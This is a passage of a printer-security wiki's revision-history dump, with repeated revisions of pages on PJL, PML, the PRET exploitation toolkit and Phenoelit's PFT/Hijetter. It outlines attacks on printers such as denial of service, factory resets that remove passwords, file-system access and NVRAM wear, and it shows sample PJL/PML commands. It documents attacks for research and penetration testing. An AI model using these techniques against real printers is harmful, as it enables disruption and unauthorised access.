studied in this wiki. → ''Related aricles:'' [[PostScript]], [[PJL]] ---------- fce1bca013bd9cc75c26e615567e8ad13bd93092 0 30 101 99 2017-01-10T18:11:55Z 134.147.128.156 0 wikitext text/x-wiki PFT, libPJL and Hijetter were the first publicly available tools for network printer exploitation. They are written in C++/VC++ and have been released by the legendary Phenoelit hacking group in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display. Furthermore, PFT allows penetration testers to set and crack PJL passwords. == External links == * [http://www.phenoelit.org/hp/ Official website] ef3d4bf96a64e6ff771a43c34bd6daac2c41ecd8 99 98 2017-01-10T18:08:25Z 134.147.128.156 0 wikitext text/x-wiki PFT, libPJL and Hijetter were the first publicly available tools for printer exploitation. They are written in C++/VC++ and have been released by the legendary Phenoelit hacking group in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display. Furthermore, PFT allows penetration testers to set and crack PJL passwords. == External links == * [http://www.phenoelit.org/hp/ Official website] 655ab51a32799a2c3eda14de58726cd642d5eb54 98 90 2017-01-10T18:05:41Z 134.147.128.156 0 wikitext text/x-wiki PFT, libPJL and Hijetter were the first publicaly available C++ tools for printer exploitation, released by the Phenoelit in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display and allow penetration testers to set and crack PJL passwords. == External links == * [http://www.phenoelit.org/hp/ Official website] 1e9516e1dcf90fed934e92a41a9061edef74ff83 90 2017-01-09T18:36:41Z 134.147.202.176 0 Created page with "While printer manufacturers added various proprietary featured to PostScript and PJL, their standards -- and in particular the possibility to access the file system -- date ba..." wikitext text/x-wiki While printer manufacturers added various proprietary featured to PostScript and PJL, their standards -- and in particular the possibility to access the file system -- date back to the 80s \cite{press1985postscript} and 90s \cite{hp1997pjl}. For PJL, this issue has first been demonstrated by \cite{phenoelit2002embedded} who wrote the ''PFT and Hijetter''\footnote{FtR of Phenoelit, \textit{PFT and Hijetter}, \url{http://www.phenoelit.org/hp/}, Jun. 2016} programs to perform file operations on HP LaserJets using legitimate PJL commands which heavily inspired [[PRET]]. tbd: a The Hijetter gives you the opportunity to explore printers via their PJL interface. This includes access to the environment variables the file system and the display of the target. You might play around with these elements in order to improve or decrease the performance and usability of a printer. This was the first attempt of a Perl coder to use VC++. crack the password, dump and set PJL environment variables pft Printer Job Language library and tool http://m.blog.csdn.net/article/details?id=46874173 1fd00078730f96df1f0e4e291d2372e0a2c7c199 0 20 623 622 2017-06-06T09:53:33Z 83.165.142.57 0 wikitext text/x-wiki [[File:PJL-display.png|thumb|Classic prank: PJL displays ‘HACKED’]] The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ ac5fef551a219dec147c7bc6e267077000b7e18c 622 300 2017-06-05T21:44:00Z 83.165.142.57 0 wikitext text/x-wiki [[File:PJL-display.png|thumb|Classic prank: PJL display ‘HACKED’]] The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 23287df863dfe6f150fe7f3b74f40d7804c65d4b 300 225 2017-01-31T07:52:47Z 84.153.135.37 0 wikitext text/x-wiki [[File:PJL-display.png|thumb|Classic prank: PJL display ‘hacks’]] The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 29b6afef2f4b79b9a2e54c15b85f4272e41454c1 225 221 2017-01-23T20:01:02Z Admin 1 wikitext text/x-wiki [[File:PJL-display.png|thumb|Classic prank: PJL display ‘hacks’]] The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 424095cafe5fbdb7c85372758dc5e8ea6c06d0ae 221 130 2017-01-23T18:44:13Z Admin 1 wikitext text/x-wiki [[File:PJL-display.png|thumb|Classic prank: PJL display ‘hacks’]] The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ aac566ba5b3f732ba18c4d6c152bbde5ca1146fa 130 108 2017-01-14T19:59:11Z Admin 1 wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ b4d182fa1a9722a6c0e338f2314d1943fb94b8f3 108 85 2017-01-14T17:15:44Z 134.147.128.156 0 wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 4b9fbc084730e072cf9224bb87ed46dad1e00ba5 85 76 2017-01-09T09:54:32Z Admin 1 wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997 p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ a187e7d0a9c98f5eb045f2009d25498cf7381f2f 76 64 2017-01-08T18:37:09Z Admin 1 wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997 p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. → ''Related aricles:'' [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 5e439bf086659c4560938a1175e24aa02bb71d46 64 2017-01-08T15:35:03Z Admin 1 Created page with "The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>..." wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997 p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. ------------ 53fc35544871461cb005ccf3b6bfa7250eafb31b 0 22 628 307 2017-06-25T11:23:20Z Admin 1 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[attack carriers]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: <syntaxhighlight lang=sh> > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 </syntaxhighlight> The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexadecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As can be seen, it is possible to invoke (a subset of) SNMP commands over PJL via PML. A security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- a1352cf25c960d8f526e34829ee00dbb45e41c20 307 306 2017-01-31T08:20:11Z 84.153.135.37 0 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: <syntaxhighlight lang=sh> > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 </syntaxhighlight> The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexadecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As can be seen, it is possible to invoke (a subset of) SNMP commands over PJL via PML. A security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- 0f678868c525046e35270e9e66b0b20401313cee 306 178 2017-01-31T08:15:11Z 84.153.135.37 0 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: <syntaxhighlight lang=sh> > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 </syntaxhighlight> The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- ae20c07092130569df8e3043a8564d4f7045f02c 178 129 2017-01-21T11:46:18Z Admin 1 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: <syntaxhighlight lang=sh> > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 </syntaxhighlight> The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- 8ce7ab5420af8f15747d614c8a4d1f01d24ac215 129 86 2017-01-14T19:58:37Z Admin 1 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- 1c9df5f161664e760edbeac48a91c6fefcf83863 86 69 2017-01-09T09:59:29Z Admin 1 wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]] ----------- ddc2df3283758c4e2fa651fb14c1b04f7d10e983 69 2017-01-08T17:10:42Z Admin 1 Created page with "'''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features o..." wikitext text/x-wiki '''TBD: This article needs further explanation''' The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below: > @PJL DMINFO ASCIIHEX="000006030302010301" < "8000000603030201030114106870204c617365724a65742034323530 The rear part of string responded by the printer, <code>6870204c617365724a65742034323530</code> is hexdecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitve use of PML is to to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords. → ''Related aricles:'' [[SNMP]], [[Factory defaults]] ----------- f175309a7c9a20d186415c2c05090e947f68b4c2 0 4 328 103 2017-01-31T15:37:53Z Admin 1 wikitext text/x-wiki The PRinter Exploitation Toolkit (PRET) is a Python tool developed at the University of Bochum to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]]. == External links == * [https://github.com/RUB-NDS/PRET Official website] 33de10327466dbc96901a049c252fd6f644142ea 103 102 2017-01-10T18:27:55Z 134.147.128.156 0 wikitext text/x-wiki The Printer Exploitation Toolkit (PRET) is a Python tool developed at the University of Bochum to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]]. == External links == * [https://github.com/RUB-NDS/PRET Official website] 5187959cb1a6d3ee1d796525c3a411ead729d4ef 102 6 2017-01-10T18:25:48Z 134.147.128.156 0 wikitext text/x-wiki The Printer Exploitation Toolkit (PRET) is a Python tool to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]]. == External links == * [https://github.com/RUB-NDS/PRET Official website] beaf581f3c95a211fb2ec930ce0f3992bf05b61b 6 5 2016-11-22T09:17:18Z Admin 1 wikitext text/x-wiki https://github.com/RUB-NDS/PRET 97a945bb019ca977ee725e2a3ba150f16f1c9e53 5 2016-11-22T09:17:07Z Admin 1 Created page with "https.//github.com/RUB-NDS/PRET" wikitext text/x-wiki https.//github.com/RUB-NDS/PRET 088637a8fe7a5bd5a7526912457dd15b12ca5d36 0 33 624 333 2017-06-17T13:15:37Z 216.117.236.42 0 Cleanup wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets ‘flash chips would only sustain about 1000-2000 cycles of re-writing’ <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical 